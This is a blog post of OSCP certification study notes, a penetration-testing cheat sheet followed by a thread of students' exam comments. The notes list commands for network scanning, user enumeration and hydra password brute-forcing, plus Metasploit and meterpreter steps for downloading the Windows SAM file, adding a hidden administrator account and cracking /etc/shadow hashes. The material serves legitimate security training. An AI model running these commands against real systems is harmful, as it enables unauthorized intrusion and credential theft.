Untitled

OSCP Notes by Ash

Reference Site:  http://security.crudtastic.com/?p=213


Use Leo and make a new child entry for each IP. Keep ALL information related to testing of that machine in that child entry. Create child entries within the IP entry for each type of scan/information gathering. Create a totally separate child entry for username/password combinations, general notes etc. Leo/good record keeping is what will win the game.


Scan network for live hosts

(nmap/zenmap)

For NMAP –


nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt

cat hosts_up.txt | grep -i “up”


nmap -PN 192.168.9.200-254

(this will also show open ports for each host)


Identify OS

(nmap/zenmap)

For NMAP –


nmap -O 192.168.0.100 (just OS fingerprint)


nmap -A 192.168.9.201 (runs an “aggressive” scan – scan,OS fingerprint, version scan, scripts and traceroute)


Check hosts for services

(nmap/zenmap)

For NMAP

- nmap -sS 192.168.9.254 (TCP)

- nmap -sU 192.168.9.254 (UDP)

(Could be better to do this in zenmap and group servers by services)


FOR SNMP

-  snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f


For a known port

- nmap – p 139 192.168.9.254


DNS Lookups/Hostnames


host -l <domain> <dns server>

e.g. host -l acme.local 192.168.0.220


Banner grab/Version services

(nmap/zenmap/SNMP)

Check versions of software/services against milw0rm and security focus)


For NMAP

- nmap -sV 192.168.9.254


For SNMP

snmpenum -t 192.168.0.100 (displays all snmp informations for that server)


For SMTP

nc -v <mailserver> 25

- Will give mailserver version. Can also VRFY to find valid usernames/email accounts


Netbios/SMB

- smb4k (graphical interface – lists shares)


- smbserverscan


- metasploit auxiliary scanner

./msfconsole

show

use scanner/smb/version

set RHOSTS 192.168.0.1-192.168.0.254

run


Enumerate Usernames

(SNMP/SMTP/SMB[NETBIOS]/Add others here)


For SMB

- nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions)

(on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)


For SNMP

- nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep)

- snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d” “ -f4


For SMTP – (/pentest/enumeration/vrfy)

- ./smtp_VRFY.py <mailserver IP>

** NEED TO MAKE THREADED – VERY SLOW **


SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)

- ./samrdump.py SNMP server


*** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***

*** OR /pentest/web/wfuzz/wordlists/others/names.txt ***


Crack Passwords

(hydra/THC bruter)

(need mil-dict.txt from Milw0rm – cracked hashs)


FTP – hydra -l <username> -P mil-dic.txt -f <FTP SERVER> ftp -V


POP3 – hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)


SNMP – hydra -P mil-dict.txt -f <SNMP SERVER> -V


MS VPN – dos2unix words (whatever word list)

cat words | thc-pptp-bruter VPN server


Look for known vulnerable services

(refer nmap/zenmap output)

Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com


Compile exploit code if possible

(milw0rm archive)


cd /pentest/exploits/milw0rm

cat sploitlist.txt | grep -i [exploit]


Some exploits may be written for compilation under Windows, while others for Linux.

You can identify the environment by inspecting the headers.

cat exploit | grep “#include”


Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h

Linux:   arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h


Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u


LINUX

gcc -o dcom 66.c

./dcom


WINDOWS
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe ability.c -lwsock32
wine ability.exe (to run compiled file)


Wireshark Filters


To filter out all traffic for IP 192.168.0.100

!(IP.ADDR == 192.168.0.100)


FUZZING STEPS – ASH STYLE

    Determine target application and operating system
    Obtain a copy of the application
    Analyse the RFC & communication protocols
    Discover & record crash conditions
    Analyse crash conditions for exploitation opportunities

Things we need to know

    Which 4 bytes overwrite EIP
    Do we have enough space in buffer for shellcode
    Is this shellcode easily  accessible in memory
    Does the application filter out any characters
    Will we encounter overflow protection mechanisms


(*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***)

Creating pattern for EIP location
- framework3/tools -> pattern_create.rb <length> >> Fuzzing_script (will append to the end of the script)
– then look in ollydbg for pattern (need to reverse it and convert)

- pattern_offset.rb <EIP PATTERN>
– will show byte offset

Creating shellcode
(in framework3)
./msfpayload |grep -i shell

./msfpayload …… o (for options)
./msfpayload …… c (to create)
** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **

CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)


Finding an exploit
/pentest/exploits/milw0rm
grep <exploit> sploitlist.txt


MSFCLI (p243)
./msfcli
-o options
-p payloads
-t test
-e exploit

MSFCONSOLE
sessions -l => list created sessions
sessions -i # => interact with specific session number

show options

search <string>

use exploit/ …..
set PAYLOAD ….

exploit


Meterpreter Payloads (p260)
payload = windows/meterpreter/reverse_tcp ….

meterpreter> help (lists all commands)

upload <file> c:\\windows

download c:\\windows\\repair\\sam /tmp

ps (running tasks)

execute -f cmd -c (creates a new channel with the cmd shell)
interact # (interacts with channel)


Other useful windows commands
net user ash my_password /add
net localgroup administrators ash /add


Passwords & Hashes
Windows SAM => %systemroot%\Repair
(pwdump or fgdump – p340)

or use framework meterpreter shell => gethashes

Linux => /etc/passwd & /etc/shadow


John The Ripper
for linux => unshadow passwd & shadow file to another file

./john hashes.txt


Associated Documents

Common Ports – packetlife.net/media/library/23/common-ports.pdf
Wireshark – http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
TCPDUMP – http://packetlife.net/media/library/12/tcpdump.pdf
SANS NETCAT – http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
SANS MISC TOOLS – http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
SANS 504 – Cant find

Tags: backtrack, offensive-security, offsec101, oscp, security, Study, training, tutorial
34 comments
2 pings

Skip to comment form ↓

    student

    December 24, 2009 at 5:00 pm (UTC 10)

    So did you pass your exam?! I started the course recently and came across your post while google knowledge hunting for OSCP ;-)

    What will you do after OSCP? There is the OSCE but after that the only thing I’ve found is CREST (for professional pen testers in the UK)
    Chris

    January 29, 2010 at 10:47 pm (UTC 10)

    Hi Ash, I was quite surprised to come across some writings about the OSCP challenge as I was initially looking for something on samrdump for SMB enumeration. Your list of the things for OSCP preparation is pretty close to my prep sheet.

    Unfortunately I failed the challenge. I can definitely agree that this course is very hardcore. I don’t think you can rest on your laurels! Even covering the entire content of the course I have the feeling that I’d still need to have done more outside work to get through that exam.

    I’d be interested in how you got on in any case. I’m currently going back through the course material and I hope to get some more time in the labs pretty soon to get more practice. I don’t think I spent enough time finding and using exploits, and understanding the vulnerabilities within the various OS’s and applications to get me ready for the challenge. Next time I want to make sure I have a few more things up my sleeve.

    Anyway, cheers for the information, I’d be interested in hearing about your experiences of the challenge (without obviously giving too much away)!

    Chris
    ash

    January 30, 2010 at 8:30 am (UTC 10)

    Hey Chris,

    I eventually passed :) It’s a hard exam!! It took me 2 attempts, and when I eventually passed it all seemed so simple and extremely rewarding!

    I think the key point here to your preparation is to do a lot of work in the labs. You should be able to root all of the lab boxes. Everything that you need to pass the exam (and you should be able to pass it the first time – just make sure to have a break so you don’t go mental like I did) is in the labs there. There is nothing really new, just some pretty cool twists and turns. I know a guy who spent 3 or 4 months in the labs making sure he could get all the machines there.. and he did the exam from start to finish in about 18 hours on his first go.

    But, I do think you are right, preparation is the key! I did a lot more work getting ready for my second attempt and managed to finish it in about 8 hours or so (mind you I knew what to expect this time)

    This isn’t an exam where you can sit down and read a book and hope to regurgitate it and pass (thats a CISSP hahaah)

    Anyway .. Good luck on your resit. I know how you feel, but you do have the upper hand now. Spend the time going over your scans, rebuild the lab scenarios if possible, poke around the labs to see if theres something similar, look in the book, ask in the irc channel .. trust me, things aren’t always as hard as they may seem (but they could be harder)!!

    And in the word of Muts – Try Harder hahahah
    Chris

    February 1, 2010 at 3:31 am (UTC 10)

    Thanks Ash, and congratulations! I’ll be back in the labs soon no doubt so will take your advice. Nice one, thanks. ;)
    yaggi

    September 2, 2010 at 2:22 am (UTC 10)

    Im glad you passed. Me, I failed… I think because of the limitations being set like 1 metasploit and no vuln scan.. I belive we can exploit this but their are tools that are not working during the recon like NMAP… Everytime you do the NMAP it says host is not UP even you will use almost all the options (i.e, -PN)

    Also, regarding the 4 machines, the instruction is confusing, it says to gain the root access. I believe the way to get the root of the 4 machines is to get an exploit in the internet and run it against the machine right?

    Hope I can pass in the next round..

    Hope you can share more information my friend.. Its hard to ask help also..I guess your site give at least an encouraging hints
    ash

    September 2, 2010 at 5:30 am (UTC 10)

    Dont get discouraged :)

    You can definitely nmap the machines .. check the timing (-T)

    Your first machine you have to write an exploit for .. just remember what happened in the class

    The others are the same as machines you should have done at the end of the book … there is nothing new here.

    When I resat the exam I completed it in 3 hours :) Let me know if you need to talk about this more .. good luck .. you can do it!!
    Yaggi

    September 2, 2010 at 6:50 pm (UTC 10)

    Hi ash,

    Maybe I forgot the timing option, instead, I used unicornscan and netcat scan.. When I get the information like banner, software version, open ports, OS, I feel like stuck since I can’t use more on vuln scanner and metasploit. I was completely stuck and i was not able to gain the confidence again.. I feel sorry that with this information at hand I can’t hack a machine. Although I can go to exploit-db, still the process for me is confusing… I pity myself.

    I really wanted to know how the 4 machines was hack.. Im not sure to take the exam again coz until now I can’t believe I failed.
    ash

    September 3, 2010 at 9:28 am (UTC 10)

    nah … dont quit!!

    Go back to your book and read up on what you can do. it may not be a single exploit or technique, rather multiple exploits or techniques :)

    If you can do all the exercises in the manual and get the final machines at the end of the manual, you should be fine. If you cant do them, I would suggest getting more lab time, reading the forums, and asking for some help in the IRC channel.

    There’s some awesome people about that will be more than happy to help you (they helped me greatly)

    Feel free to contact me if you need to bounce some ideas around.

    Think about trying to recreate what you scanned int he lab as virtual images so that you can sit at home and practice hacking them as well
    marco

    September 9, 2010 at 9:06 pm (UTC 10)

    hi ash and yhanks for yours usefull words.
    I failed the exam, dunno why..ehehe…i do same things you done but i cant get anything. so if u like email me and maybe we can talk about it.
    thanx
    ash

    September 10, 2010 at 6:35 am (UTC 10)

    Hi Marco .. don’t get too worried about it .. its a hard exam :)

    How many machines did you get in the exam? Where did you have troubles?

    Keep trying until you pass.. its worth it :)
    marco

    September 11, 2010 at 4:59 am (UTC 10)

    eheh..ya…really hard…
    i just exploit..0 machines… :(
    i got problems with exploitation and so i lose my mind…
    i think ive learn well and i really understand how works penetration…but…dunno why i just do nothing with the exam…
    ill try harder…
    thnx for ur help
    subtitles

    November 21, 2010 at 11:53 pm (UTC 10)

    Good post
    sean

    February 19, 2011 at 11:41 pm (UTC 10)

    Hi Ash,
    I have just taken the exam yesterday, and I think I have failed :0(
    Not a good feeling when you’ve been up all night also.
    I will pick myself up and have another go at it after a bit more pwnage in the labs.
    Just a thought.. Do they give you the same exam again? if so that will sure help.
    thanks
    ash

    February 21, 2011 at 6:25 am (UTC 10)

    hahah that exam is brutal!!

    I know how you feel .. You pretty much need to root all of the boxes to pass. Dont let it get to you in any way .. I’m sure you’ll pass it the second time.

    When I retook my exam I got the same challenges .. just different addresses. You can always practice on your own before the resit .. you should have enough information from your recon to be able to find a way to root all the boxes. After I had a good rest from my exam I had a lightbulb moment where everything seemed so much clearer and straight forward .. I ended up rooting all the boxes in next to no time when I sat it the second time.

    Good luck.. You’ll be an OSCP in no time. Post back here and let me know how you go :)
    Flux

    March 25, 2011 at 7:51 am (UTC 10)

    Hi Ash,

    It seems like allot op OSCP’s have found your post hehe. I’m still in my lab-faze trying harder every day and enjoying myself. I was just wondering a couple of things. Did you use XSS-vulns in the labs (ex: beef), is using msf auxiliary scanners possible during the exam, did you get into the End Goal in the labs?

    greetings
    Dudley

    April 17, 2012 at 9:48 pm (UTC 10)

    I’m glad to hear you passed Ash. I am studying in labs and was wondering if you have any insight as to restriction of tools on challenge? I heard that you can’t use metasploit and that has be concerned as I us it a good bit especially for pivot attacks….
    ash

    April 18, 2012 at 6:41 am (UTC 10)

    From when I did the exam you could only use metasploit for one of the boxes. If you have done the course you will know there is more than one way to skin a cat, and metasploit is just an easier automated way of exploit systems. As for pivoting .. theres numerous ways of doing that, and it’s all covered in the courseware :)

    Good luck
    Dudley

    April 19, 2012 at 12:47 am (UTC 10)

    I’ve got about 19 days left in lab and I must say I don’t feel super comfortable about taking test. I under the premise of all the exercises but have had what I would consider not such good luck in labs. I have gotten a network key and gotten into IT network but only got admin on 6 windows boxes and none of the linux boxes which bothers me. So far none of username/passwords I crack have been resused anywhere which I found odd indeed. I also wanted to know if “http://www.milw0rm.com/search.php” is still up as the site is unreachable and I’ve never been on it before. Any suggestions or helpful hints for lab would be welcome. Thanks
    Dudley

    April 19, 2012 at 12:54 am (UTC 10)

    I’m also week on building exploits as I’m not a programmer do you have any suggestions on what I can read or do to improve this?
    Dudley

    April 19, 2012 at 12:55 am (UTC 10)

    LOL I meant “weak” not “week” ………….
    DrS

    May 4, 2012 at 11:31 pm (UTC 10)

    Dudley, you don’t need to use Milw0rm or other websites as it is all in the exploit-db database on your backtrack machine :
    By mind, just go to /pentest/exploits/ and make a ‘svn update’ to update the list of public vulnerabilities -they are in sub-folders-.

    I don’t think you need great developer skills, it’s much on knowing the architecture, how a program works in memory, the network, and identify the critical points (memory access -malloc, even printf()-, database access, etc..). 99% of developers, even C developers, have no knowledge on this part which is important : a compiled program doesn’t follow exactly what a developer defines.

    Today the most common exploits vector are injections, such as SQL, XSS or session hijacking. Maybe the actual labs and the exam follow this ‘mainstream’.
    Dudley

    May 14, 2012 at 9:57 pm (UTC 10)

    So took the test and it kicked my butt. I got the buffer overflow written but struggled big time with other 4 machine. Thing is I’m not sure where to start with preparing for retake. one of the server was running hmailserver which I’m sure must have been vulnerable and the other box were runnin different version of FileZilla beta software but had no luck exploiting them at all LOL. Any helpful hints for preparing for retake would be great. Thanks a bunch
    ash

    May 15, 2012 at 7:10 pm (UTC 10)

    Well, Hopefully your scans are good enough to tell you what OSes and applications are installed on the machines in the exam. You could possibly rebuild this in your own lab environment now and work out what you need to do to root them.

    That’s where I would start my prep for a resit of the exam.

    I wouldn’t get too disheartened .. its a hard exam. One of my friends just passed it on the weekend .. and he struggled!
    Dudley

    May 15, 2012 at 8:07 pm (UTC 10)

    I was able to get app version but nmap was not able to get me an exact OS fingerprint :-( like in the case of hmailserver its running on either server 2003 or XP I suspect its server 2003. The filezilla beta are running on some version of freebsd and server 2003. Never messed with freebsd so not sure where to begin with that. I’m pretty all the test machine were running a firewall due to the limited services and ports enumerated on them. Any suggestion would be greatly appreciated. Thanks Ash.
    Dudley

    May 15, 2012 at 8:10 pm (UTC 10)

    I found this for hmailserver but could never get it to work maybe you could make some suggestions? My only guess is maybe I was doing something wrong when trying to do the exploit. Thanks

    http://www.exploit-db.com/exploits/7012/
    ash

    May 16, 2012 at 6:59 am (UTC 10)

    Have you done the actual course? There’s practice boxes in the lab for you to attack which are very similar to the machines for the final exam.

    You need to scan all of your hosts, enumerate services, and then look at what vulnerabilities you can exploit. You may not be able to exploit a root vulnerability straight away, you may need to just get shell on the box and then do a local privilege exploit or something.

    Go back to your manual and have a look at the process outlined in there for the best way to crack these boxes. Just because you see something obvious, it doesnt mean that its the answer .. you may find yourself going down a path that wont produce any results.
    Dudley

    May 16, 2012 at 8:12 pm (UTC 10)

    Yeah I did the course and thing I found was on exam that nmap scan yielded very few open ports. I’m sure the boxes had firewalls. I got one with a buffer overflow and nadda after that one :-( Should I have scanned for other hosts that weren’t being scored possibly?
    ash

    May 17, 2012 at 6:46 am (UTC 10)

    Did you scan for both TCP and UDP, did you do some SNMP scans .. did you try throttling your nmap scans a bit? Did you version the services on the ports you found?

    You only need to scan the servers that they have provided you .. theres no other systems to go for.

    Did you want to email me your scans so I can see what you have and maybe give you some help?
    Dudley

    May 17, 2012 at 8:10 pm (UTC 10)

    That would be great if you don’t mind giving me a second opinion. I’m sure I must have missed something.
    Dudley

    May 18, 2012 at 5:02 am (UTC 10)

    Where should I send my scan results to?
    Dudley

    May 21, 2012 at 7:09 pm (UTC 10)

    Hey Ash let me know where I can send my scans to to get your opinion. Thanks.
    marco

    June 22, 2012 at 8:21 am (UTC 10)

    Hi, i wrote some time ago…in these days i thought i never get pwb…fortunatly i was wrong…and i got it.
    So i can tell to everyone to listen very well this blog, because is very usefull.
    then think about it, i cannot complete PWB because my minds try to complicate a simple question.
    think easy….
    AK

    November 29, 2012 at 6:01 am (UTC 10)

    Hello ASH,

    I too flunked the exam but I made some kills before dieing out , glad you made it through, just a request to you , can we communicate over mails or IRC or IM anyhow?
    ash

    November 29, 2012 at 7:04 am (UTC 10)

    Sure, feel free to send me an email. My address is easy to find :-)

Leave a Reply

Your email address will not be published. Required fields are marked *

Name: *

Email: *

Website:

Message: *

You may use these HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>